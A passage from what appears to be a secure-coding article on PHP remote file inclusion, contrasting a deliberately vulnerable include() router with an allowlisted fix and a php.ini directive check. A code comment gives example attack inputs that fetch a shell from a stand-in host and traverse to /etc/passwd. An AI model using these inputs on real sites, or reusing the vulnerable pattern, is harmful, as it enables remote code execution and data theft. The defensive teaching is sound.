The most common source of RFI is careless PHP code that builds a file path from user input. Four language constructs execute whatever file they are handed as PHP; if that path is a URL and remote inclusion is enabled, PHP fetches the file from the URL and runs it with the application's privileges, exactly as if its contents had been pasted into the local script:
- include
- include_once
- require
- require_once
Two functions are usually listed alongside them, but they only read the remote content as data. They turn into an RFI problem when the fetched content is later passed to eval() or written to disk and included:
- fopen
- file_get_contents
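As an added example (not code from the original article), the vulnerable routing pattern beside an allowlisted version. The page names, the pages/ directory and the host evil.example are assumptions for illustration.

```php
<?php
// Added example, not from the original article. Page names, the pages/
// directory and evil.example are assumptions.

// --- Vulnerable: request input flows straight into include() ---
// With allow_url_include=On, ?page=http://evil.example/shell.txt? fetches and
// executes attacker-controlled PHP (the trailing "?" turns the appended ".php"
// into a query string, so the suffix is no defence). With it Off, local
// file inclusion such as ?page=../../../../etc/passwd%00 style tricks or
// ?page=../uploads/avatar still work.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// --- Hardened: the request only selects a key from a fixed allowlist ---
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function render_page_safe(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        exit('Unknown page');
    }
    // Defence in depth: resolve the file inside a fixed base directory and
    // confirm the resolved path is still under it (catches symlinks and
    // mistakes in the allowlist itself).
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$page]);
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(500);
        exit('Page misconfigured');
    }
    include $path;
}

render_page_safe($_GET['page'] ?? 'home');
```

The allowlist is the actual fix: the request never contributes characters to the path, only a lookup key. The realpath check costs nothing and catches the day someone adds a bad entry to the list.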
Importing PHP code isn't the only possibility. If the application hands fetched content to the shell (through exec(), system(), or a script it launches), an attacker can supply a remote file that runs as a shell script under the web server's account. Either way the result is code execution with the server's privileges: it can read credentials and other data, alter files, and connect out to a command-and-control server.
PHP has two php.ini directives that control whether URL wrappers (http://, ftp://, and also data:// and php://input) are accepted in file operations. allow_url_fopen governs the stream functions such as fopen() and file_get_contents(); allow_url_include governs include and require, and it only takes effect when allow_url_fopen is also on. Remote file inclusion therefore needs both set to On; allow_url_fopen on its own lets the application fetch remote data but not execute it. allow_url_include has defaulted to Off since PHP 5.2 and is deprecated as of PHP 7.4, and both directives are PHP_INI_SYSTEM, so a script cannot switch them on with ini_set(); audit php.ini (or the FPM pool and Apache configuration) rather than the code. Turning them off when they aren't needed significantly reduces the risk, but it does not remove it: the same include with user-controlled input still permits local file inclusion (../../etc/passwd, log files, uploaded files), so the real fix is never to build an include path from request data.
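As an added example (not from the original article), a bootstrap check that reads the two directives at runtime and refuses to serve requests when remote inclusion is enabled. The php.ini lines in the comment show the weak value beside the hardened one; the log messages are assumptions.

```php
<?php
// Added example, not from the original article. Log messages are assumptions.
//
// Both directives are PHP_INI_SYSTEM, so ini_set() cannot change them from a
// script; they are fixed in php.ini (or the FPM pool / Apache config):
//
//   allow_url_fopen   = Off   ; weak: On  (the PHP default)
//   allow_url_include = Off   ; weak: On  (default Off since 5.2,
//                             ;            deprecated in 7.4)

/**
 * Return the names of the remote-inclusion directives that are enabled.
 * ini_get() hands back the raw configured string ("1", "On", "yes", ...),
 * so normalise it with FILTER_VALIDATE_BOOLEAN instead of comparing to "1".
 */
function remote_inclusion_enabled(): array
{
    $enabled = [];
    foreach (['allow_url_include', 'allow_url_fopen'] as $directive) {
        $value = ini_get($directive);
        if ($value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $directive;
        }
    }
    return $enabled;
}

$enabled = remote_inclusion_enabled();

// allow_url_include is what turns include/require into code execution from a
// URL (and from data:// and php://input), so treat it as fatal.
if (in_array('allow_url_include', $enabled, true)) {
    error_log('allow_url_include is On; refusing to serve requests');
    http_response_code(500);
    exit;
}

// allow_url_fopen alone lets file_get_contents() and friends fetch URLs
// (remote data access, not code execution); log it so the setting is noticed.
if (in_array('allow_url_fopen', $enabled, true)) {
    error_log('allow_url_fopen is On; stream functions will accept URLs');
}
```

Run it before any application code, for example from the front controller or through the auto_prepend_file directive. Note that disabling allow_url_fopen breaks any code that relies on file_get_contents('http://...'); applications that use cURL for outbound HTTP are unaffected.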